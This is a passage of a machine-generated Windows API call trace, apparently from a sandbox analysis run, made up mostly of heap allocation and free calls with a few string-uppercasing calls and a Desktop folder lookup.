Flags=0x0, Size=0x10) returned 0x24a9738 [0145.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1458 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9738 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1458 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9720 | out: hHeap=0x25c0000) returned 1 [0145.391] FreeLibrary (hLibModule=0x77130000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1068 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13a8 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96c0 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9690 | out: hHeap=0x25c0000) returned 1 [0145.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a94e0 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9510 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9528 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9588 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a94c8 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9498 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95a0 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9540 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9630 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9600 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95e8 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9618 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9558 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9660 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13e8 | out: hHeap=0x25c0000) returned 1 [0145.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9660 [0145.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13e8 [0145.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9660 | out: hHeap=0x25c0000) returned 1 [0145.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0010 [0145.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9660 [0145.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24166b0 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0145.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1408 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13f8 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af7a0 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af6d8 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aff98 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aff70 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1158 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affe8 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aff48 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1398 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aff20 | out: hHeap=0x25c0000) returned 1 [0145.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24afef8 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af778 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96a8 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96f0 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24166b0 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9660 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0010 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13e8 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0145.394] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0145.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13e8 [0145.394] CharUpperBuffW (in: lpsz="A2B10104C1C", cchLength=0xb | out: lpsz="A2B10104C1C") returned 0xb [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13e8 | out: hHeap=0x25c0000) returned 1 [0145.394] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0145.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13e8 [0145.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0145.394] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0145.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0145.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0145.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0145.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9660 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96f0 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1398 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1398 | out: hHeap=0x25c0000) returned 1 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1398 [0145.395] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0145.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0145.395] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0145.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1158 [0145.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0145.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0145.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1398 | out: hHeap=0x25c0000) returned 1 [0145.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0145.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0145.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96a8 | out: hHeap=0x25c0000) returned 1 [0145.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0145.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96f0 | out: hHeap=0x25c0000) returned 1 [0145.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0145.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0145.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96f0 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1398 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0145.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1398 | out: hHeap=0x25c0000) returned 1 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1398 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96a8 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0145.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9390 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0145.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0010 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af778 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0145.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24afef8 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24aff20 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0145.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13b8 [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24aff48 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0145.398] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9558 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13f8 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9618 [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13f8 | out: hHeap=0x25c0000) returned 1 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13f8 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.398] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13f8 | out: hHeap=0x25c0000) returned 1 [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9618 | out: hHeap=0x25c0000) returned 1 [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9558 | out: hHeap=0x25c0000) returned 1 [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0145.398] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9558 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0145.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9558 | out: hHeap=0x25c0000) returned 1 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9558 [0145.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affe8 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9618 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13f8 [0145.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9618 | out: hHeap=0x25c0000) returned 1 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24aff70 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9618 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95e8 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1408 [0145.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9558 | out: hHeap=0x25c0000) returned 1 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24aff98 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1418 [0145.399] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aff98 | out: hHeap=0x25c0000) returned 1 [0145.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1418 | out: hHeap=0x25c0000) returned 1 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9558 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1418 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9600 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9630 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0145.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0145.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9540 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0145.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95a0 [0145.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24aff98 [0145.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9498 [0145.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9498 | out: hHeap=0x25c0000) returned 1 [0145.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af6d8 [0145.400] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9588 | out: hHeap=0x25c0000) returned 1 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24af7a0 | out: hHeap=0x25c0000) returned 1 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f40 | out: hHeap=0x25c0000) returned 1 [0145.400] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1458 | out: hHeap=0x25c0000) returned 1 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1388 | out: hHeap=0x25c0000) returned 1 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9690 | out: hHeap=0x25c0000) returned 1 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a94e0 | out: hHeap=0x25c0000) returned 1 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1458 | out: hHeap=0x25c0000) returned 1 [0145.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1458 | out: hHeap=0x25c0000) 